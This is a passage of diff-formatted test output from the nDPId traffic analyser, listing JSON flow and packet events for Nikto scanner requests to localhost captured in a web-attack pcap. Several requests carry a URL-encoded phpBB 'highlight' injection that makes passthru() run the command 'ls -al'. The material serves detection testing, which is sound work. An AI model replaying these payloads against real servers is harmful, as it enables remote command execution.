00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="} 
-01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} +01199{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="} 
-01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} +01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="} 
-01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 